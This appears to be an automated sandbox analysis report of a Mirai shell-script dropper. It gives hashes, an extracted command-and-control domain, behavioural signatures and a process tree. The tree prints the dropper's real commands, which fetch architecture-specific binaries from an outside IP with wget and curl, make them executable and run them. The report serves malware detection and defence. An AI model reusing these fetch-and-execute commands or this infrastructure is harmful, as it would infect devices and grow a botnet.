Analysis
-
max time kernel
135s -
max time network
145s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18-12-2024 02:31
Static task
static1
Behavioral task
behavioral1
Sample
504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh
-
Size
2KB
-
MD5
156f8033151bacfe7fbd2b38e8ed8230
-
SHA1
8e2424caff27c90c3792ebc7a3d3312f9ad31474
-
SHA256
504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f
-
SHA512
dd1623dd530087ea2b2f3d554807d1a8e5d3914a8ecdd61433d9f64a4f585afcc7fd8a3ffcb7237363842b722cced8c5d34f60b631349cd73cfbd674c99cb534
Malware Config
Extracted
mirai
UNSTABLE
servers.vlrt-gap.com
Extracted
mirai
UNSTABLE
Extracted
mirai
UNSTABLE
servers.vlrt-gap.com
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 706 chmod 713 chmod 721 chmod 747 chmod 797 chmod 813 chmod 827 chmod 694 chmod 735 chmod 763 chmod 842 chmod 849 chmod 855 chmod -
Deletes itself 2 IoCs
pid Process 723 WTH 764 WTH -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/WTH 695 WTH /tmp/WTH 708 WTH /tmp/WTH 714 WTH /tmp/WTH 723 WTH /tmp/WTH 737 WTH /tmp/WTH 748 WTH /tmp/WTH 764 WTH /tmp/WTH 798 WTH /tmp/WTH 814 WTH /tmp/WTH 828 WTH /tmp/WTH 843 WTH /tmp/WTH 850 WTH /tmp/WTH 856 WTH -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp WTH -
Writes file to system bin folder 4 IoCs
description ioc Process File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH -
Changes its process name 2 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself t26c4ng08sh50o36 723 WTH Changes the process name, possibly in an attempt to hide itself pvkna6dn 764 WTH -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp WTH -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 698 wget 702 curl 705 cat -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/zmap.mips wget File opened for modification /tmp/zmap.arm6 wget File opened for modification /tmp/zmap.ppc wget File opened for modification /tmp/zmap.sh4 curl File opened for modification /tmp/zmap.m68k curl File opened for modification /tmp/zmap.arc curl File opened for modification /tmp/zmap.x86 wget File opened for modification /tmp/zmap.mips curl File opened for modification /tmp/zmap.mpsl wget File opened for modification /tmp/zmap.mpsl curl File opened for modification /tmp/zmap.arm7 curl File opened for modification /tmp/zmap.arm7 wget File opened for modification /tmp/zmap.ppc curl File opened for modification /tmp/zmap.spc curl File opened for modification /tmp/zmap.x86 curl File opened for modification /tmp/WTH 504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh File opened for modification /tmp/zmap.arm wget File opened for modification /tmp/zmap.arm curl File opened for modification /tmp/zmap.arm6 curl File opened for modification /tmp/zmap.i686 curl File opened for modification /tmp/zmap.arm5 wget File opened for modification /tmp/zmap.arm5 curl File opened for modification /tmp/zmap.m68k wget File opened for modification /tmp/zmap.spc wget File opened for modification /tmp/zmap.sh4 wget
Processes
-
/tmp/504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh/tmp/504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh1⤵
- Writes file to tmp directory
PID:668 -
/usr/bin/wgetwget http://185.196.11.47/zmap.x862⤵
- Writes file to tmp directory
PID:675
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:683
-
-
/bin/catcat zmap.x862⤵PID:693
-
-
/bin/chmodchmod +x 504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-gauy2N WTH zmap.x862⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
PID:695
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:698
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:702
-
-
/bin/catcat zmap.mips2⤵
- System Network Configuration Discovery
PID:705
-
-
/bin/chmodchmod +x 504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh fileutl.message.4Uz2lz systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-gauy2N WTH zmap.mips zmap.x862⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
PID:708
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.mpsl2⤵
- Writes file to tmp directory
PID:710
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:711
-
-
/bin/catcat zmap.mpsl2⤵PID:712
-
-
/bin/chmodchmod +x 504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-gauy2N WTH zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:713
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
PID:714
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm2⤵
- Writes file to tmp directory
PID:716
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:717
-
-
/bin/catcat zmap.arm2⤵PID:720
-
-
/bin/chmodchmod +x 504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-gauy2N WTH zmap.arm zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:721
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:723
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm52⤵
- Writes file to tmp directory
PID:725
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/catcat zmap.arm52⤵PID:734
-
-
/bin/chmodchmod +x 504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-gauy2N WTH zmap.arm zmap.arm5 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
PID:737
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm62⤵
- Writes file to tmp directory
PID:738
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/catcat zmap.arm62⤵PID:746
-
-
/bin/chmodchmod +x 504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-gauy2N WTH zmap.arm zmap.arm5 zmap.arm6 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
PID:748
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm72⤵
- Writes file to tmp directory
PID:750
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/catcat zmap.arm72⤵PID:761
-
-
/bin/chmodchmod +x 504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-gauy2N WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:764
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.ppc2⤵
- Writes file to tmp directory
PID:786
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/catcat zmap.ppc2⤵PID:795
-
-
/bin/chmodchmod +x 504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh systemd-private-e1577321d5554d62a07a00830fa91267-systemd-timedated.service-gauy2N WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
PID:798
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.m68k2⤵
- Writes file to tmp directory
PID:801
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/catcat zmap.m68k2⤵PID:808
-
-
/bin/chmodchmod +x 504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
PID:814
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.spc2⤵
- Writes file to tmp directory
PID:816
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/catcat zmap.spc2⤵PID:825
-
-
/bin/chmodchmod +x 504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
PID:828
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.i6862⤵PID:831
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/catcat zmap.i6862⤵PID:841
-
-
/bin/chmodchmod +x 504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
PID:843
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.sh42⤵
- Writes file to tmp directory
PID:844
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/catcat zmap.sh42⤵PID:848
-
-
/bin/chmodchmod +x 504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
PID:850
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arc2⤵PID:852
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/catcat zmap.arc2⤵PID:854
-
-
/bin/chmodchmod +x 504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f.sh WTH zmap.arc zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
PID:856
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
94KB
MD58ae4ac18a3b34fba963f59a42ff02fb7
SHA1e9f75cf21972b2c953163d64d3cb89bd6a93cc1b
SHA256c485a846f4b7c5d410762291758175ca0775ca919da52ef05047f3000045020a
SHA512af6a9fb41fc94fdb3c1448e2477190f403b14eca2502e93c1ab6a1c8cf0eaada47dedd81df94f15bc6efa8ae29d68f3a6368c67283514c88f3f8e28519bf6bb0
-
Filesize
94KB
MD5d81e9564b8b9d62d70bda936d927d875
SHA142706a08b0545984ed5a5cfbdff3fe2ab62ca552
SHA256c14fead55aee69ec760fdba5f5371922595ad9df3c7201feb088f322043def0d
SHA512282a8641c62e67b1bde30e1bfbd991493c38155b6dfdb5406a80d69b7b710bfe27fdbe5571363c3f55e2fbb0a447db3789c5609493e24daef3260c2d87417886
-
Filesize
74KB
MD59784e8db8dae548a6593644e3a168579
SHA1afa7c4ce4b0122ec5f22dc37aa7658f41cb01008
SHA2564278fcf8ef5692822cc5eccce4857b5132f8d029949b83925a7a1e6f5c969129
SHA5127f48ae6e910f87f70995c6373083c534670e2f66310e51e8a0b43bc01a31327e33a992b3ad50bc4956e4c9fb3c0845e6ca6aca2dbb014e66487a8338efe2eb6c
-
Filesize
49KB
MD5241482e2337afd65af97770b37d5c90d
SHA1c52137309238b4f1badf1e7bf01197bc48cd00fc
SHA25601d39c861837c2f70e59a1e0af94249269813cfa8dc2696d095d36db84fcf7ca
SHA512cf3fbd84e7664d26a5cdbec8fb195d28438aca00c62b3428fd6d4c4ab7cb781d5816afa6eb046def918efc73059192683ba313c06fec2231cc6cff8610d29a00
-
Filesize
152KB
MD5f51e09e21e26b88091e5817482391af9
SHA135ac89537e69e933a9412877638edd2ddaf48195
SHA256ff15bf021c5804b34110ecab8a8c86dd399c60b246cb626f536a000b26b27e96
SHA51213a46b95db2323015267dd034bde6b2517ea447d091ba7b702aa249ea7172d876156554387b9a5640490b97217f48f843b28f00f65fdc45948a93fbbdb5dd1c3
-
Filesize
61KB
MD5d1f752879420a6d45d76f130281392d6
SHA146a92c0efae33b8a826dc48daa3dbf3d30be4a15
SHA2564fc42ee2d91d577e0bcc49c27d5f3936584ad49c27b5032baa57a6c6e53b4914
SHA51291e7beb1157bf75f4e73459eb2ab003005aa591848698451ee6dc79764570bf2d8a253c25dda6346b657367844048cd21be38b6485d169e373e8455b2d586225